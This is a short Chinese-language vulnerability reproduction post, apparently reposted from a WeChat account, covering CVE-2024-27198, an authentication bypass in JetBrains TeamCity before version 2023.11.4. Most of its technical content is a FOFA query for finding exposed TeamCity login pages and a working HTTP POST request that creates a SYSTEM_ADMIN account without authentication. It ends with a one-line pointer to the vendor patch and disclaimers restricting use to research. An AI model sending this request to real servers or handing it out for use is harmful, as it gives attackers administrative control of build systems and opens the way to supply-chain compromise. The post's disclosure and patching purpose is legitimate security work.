免责声明:文章中内容来源于互联网,涉及的所有内容仅供安全研究与教学之用,读者将其信息做其他用途而造成的任何直接或者间接的后果及损失由用户承担全部法律及连带责任。文章作者不承担任何法律及连带责任!如有侵权烦请告知,我们会立即删除整改并向您致以歉意。
0x00.产品介绍
TeamCity是JetBrains旗下的一款功能强大的持续集成(Continuous Integration,简称CI)工具,包括服务器端和客户端。默认情况下,TeamCity 通过 HTTP 端口8111公开Web 服务器,并且可以选择配置为通过 HTTPS 运行。
0x01.影响范围
TeamCity(On-Premises)< 2023.11.40x02.漏洞概述
未经身份验证的远程攻击者利用CVE-2024-27198可以绕过系统身份验证,完全控制所有TeamCity项目、构建、代理和构件,为攻击者执行供应链攻击。
0x03.漏洞复现
FOFA
body="Log in to TeamCity"
POC
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1Host: youipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: */*Content-Type: application/jsonAccept-Encoding: gzip, deflate{"username": "test123", "password": "test123", "email": "[email protected]","roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
发送请求后返回包如下代表用户新建成功,用户名密码为test123,后续正常登录即可
0x04.修复建议
厂商已提供漏洞修补方案,请关注厂商主页及时更新
https://blog.jetbrains.com/teamcity/2024/03/teamcity-2023-11-4-is-out/免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
遵守网络安全法,请勿用于非法入侵,仅供学习
原文始发于微信公众号(深白网安):JetBrains TeamCity 身份验证绕过漏洞复现(CVE-2024-27198)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论